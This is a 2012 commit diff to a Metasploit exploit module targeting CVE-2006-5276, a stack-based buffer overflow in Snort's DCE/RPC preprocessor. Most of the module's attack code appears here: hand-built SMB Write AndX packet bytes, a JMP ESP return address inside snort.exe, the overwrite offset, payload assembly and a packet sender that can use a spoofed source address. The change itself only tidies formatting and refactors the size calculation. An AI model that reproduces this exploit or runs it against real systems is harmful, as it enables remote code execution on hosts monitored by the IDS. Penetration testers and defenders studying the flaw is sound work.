Tidied up the exploit

2012-04-06 20:41:54 -04:00 · 2012-04-06 20:41:54 -04:00 · b2e0acd92a
parent b184a6dc5c
commit b2e0acd92a
1 changed files with 38 additions and 34 deletions
--- a/modules/exploits/windows/ids/snort_dce_rpc.rb
+++ b/modules/exploits/windows/ids/snort_dce_rpc.rb
@ -19,44 +19,49 @@ class Metasploit3 < Msf::Exploit::Remote

 	def initialize(info = {})
 		super(update_info(info,
-			'Name'	    => 'Stack-based buffer overflow in the DCE/RPC preprocessor in Snort',
-			'Description'    => %q{
+			'Name' => 'Stack-based buffer overflow in the DCE/RPC preprocessor in Snort',
+			'Description' => %q{
 				This module allows remote attackers to execute arbitrary code exploiting the Snort
 				service via crafted SMB traffic. The vulnerability is caused due to a boundary error
 				within the DCE/RPC preprocessor when reassembling SMB Write AndX requests. This can
 				be exploited to cause a stack-based buffer overflow via a specially crafted packet
-				sent over a network that is monitored by Snort.
-				
+				sent on a network that is monitored by Snort.
+
 				Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.
-				
+
 				Any host on the Snort network may be used as the remote host. The remote host does not
 				need to be running the SMB service for the exploit to be successful.
-				
+
 				Original discovery by Neel Mehta, IBM Internet Security Systems X-Force.
 			},
-			'Author'	  =>
+			'Author' =>
 				[
 					'Carsten Maartmann-Moe <carsten@carmaa.com>'
 				],
-			'License'	 => MSF_LICENSE,
-			'Version'	 => '$Revision$',
-			'Platform'	=> 'win',
-			'References'     =>
+			'License' => MSF_LICENSE,
+			'Version' => '$Revision$',
+			'Platform' => 'win',
+			'References' =>
 				[
 					[ 'OSVDB', '67988' ],
 					[ 'CVE', 'CVE-2006-5276' ],
 					[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
 				],
-			'Privileged'     => true,
-			'Payload'	 =>
+			'Privileged' => true,
+			'Payload' =>
 				{
-					'Space'    => 500,
+					'Space' => 500,
 					'BadChars' => "\x00",
 					'DisableNops' => true,
 				},
 			'Targets'	 =>
 				[
-					[ 'Windows Universal', { 'Ret' => 0x00407c01 } ], # JMP ESP snort.exe
+					[ 'Windows Universal',
+						{
+							'Ret' => 0x00407c01,  # JMP ESP snort.exe
+							'Offset' => 0x0121    # The number of bytes before overwrite
+						}
+					],
 				],
 			'DisclosureDate' => 'Feb 19 2007',
 			'DefaultTarget' => 0))
@ -64,28 +69,28 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_options(
 			[
 				Opt::RPORT(139),
-				OptAddress.new('RHOST', [ true,  "A host on the Snort-monitored network"]),
-				OptAddress.new('SHOST', [false, 'The (potentially spoofed) source address', nil])
+				OptAddress.new('RHOST', [ true,  'A host on the Snort-monitored network' ]),
+				OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address', nil ])
 			], self.class)
-			
-			deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
+
+		deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
 	end

 	def exploit
 		open_pcap
-		
+
 		shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)
-		
+
 		p = buildpacket(shost, rhost, rport.to_i)
-		
+
 		print_status("Sending crafted SMB packet from #{shost} to #{rhost}:#{rport}...")
-		
+
 		capture_sendto(p, rhost)
-		
+
 		# Cleanup
 		handler
 	end
-	
+
 	def buildpacket(shost, rhost, rport)
 		p = PacketFu::TCPPacket.new
 		p.ip_saddr = shost
@ -93,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		p.tcp_dport = rport
 		p.tcp_flags.psh = 1
 		p.tcp_flags.ack = 1
-		
+
 		# SMB packet borrowed from http://exploit-db.com/exploits/3362

 		# NetBIOS Session Service, value is the number of bytes in the TCP segment,
@ -130,27 +135,26 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Write AndX Request #2
 		header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
 		header << "\x00\x48\x00\x00\x00\xff\x01"
-		
+
 		tail =    "\x00\x00\x00\x00\x49\x00\xee"
-		
+
 		# Return address
 		eip =  [target['Ret']].pack('V')
-		
+
 		# Sploit
 		sploit = make_nops(10)
 		sploit << payload.encoded

 		# Padding (need to bad the payload with one byte to pass size check)
 		sploit << make_nops(1)
-		
-		# The size of the Write AndX Request #2, including sploit payload
-		# The number of bytes overwritten by initial size (0x0130) is 14 (0x0e).
-		size = [(sploit.size() - 1 - 0x0e + 0x0130)].pack('v')
+
+		# The size to be included the Write AndX Request #2, including sploit payload
+		size = [(sploit.size() + target['Offset'])].pack('v')

 		# Assemble the parts into one package
 		p.payload = header << size << tail << eip << sploit
 		p.recalc
-		
+
 		p
 	end
 end